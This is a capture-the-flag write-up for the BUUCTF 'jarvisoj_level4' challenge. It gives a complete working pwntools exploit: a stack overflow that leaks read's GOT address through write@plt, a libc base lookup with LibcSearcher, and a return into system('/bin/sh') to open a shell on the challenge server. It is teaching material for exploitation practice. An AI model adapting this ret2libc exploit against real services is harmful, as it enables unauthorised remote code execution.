BUUCTF---jarvisoj_level4

Environment: WSL2, Ubuntu 16.04, Python 2

Run checksec on the file:
[BUUCTF---jarvisoj_level4: image 1, checksec output]
Load the file into IDA.
Overflow point:
[BUUCTF---jarvisoj_level4: image 2, the vulnerable function in IDA]
The difference from level3 is that
write is not called before read, so the function whose address we leak has to be read: we call write via its PLT entry to print the address stored in read's GOT entry, and from that leaked address compute the libc base.

payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)

Receive the leaked address:

read_addr = u32(io.recv(4))

After that it is the usual routine: find the addresses of system and "/bin/sh" and call system with it.

libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

Full exploit:

# coding=utf-8
from pwn import *
from LibcSearcher import *

#io = process("./level4")
io = remote("node4.buuoj.cn","29445")
elf = ELF("./level4")
context(os = "linux", arch = "i386")

read_got = elf.got['read']      # GOT slot holding read's resolved libc address
write_plt = elf.plt['write']    # PLT stub we return into to call write()
main_addr = 0x8048470           # return to main after the leak so we can overflow again

# 0x88 bytes of buffer + 4 bytes of saved ebp, then the overwritten return address.
# Stage 1: write(1, read_got, 4) and return to main.
payload = (0x88+0x04)*'a'+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)
io.send(payload)

# The 4 leaked bytes are read's address inside libc.
read_addr = u32(io.recv(4))

# Identify the remote libc by read's low address bits and compute the base.
libc = LibcSearcher("read",read_addr)
libc_base = read_addr - libc.dump('read')
sys_addr = libc_base + libc.dump('system')
bin_sh_addr = libc_base + libc.dump("str_bin_sh")

# Stage 2: system("/bin/sh"); the fake return address after system is 0.
payload = (0x88+0x04)*'a'+p32(sys_addr)+p32(0)+p32(bin_sh_addr)
io.send(payload)
io.interactive()

Result:
[BUUCTF---jarvisoj_level4: image 3, shell obtained]
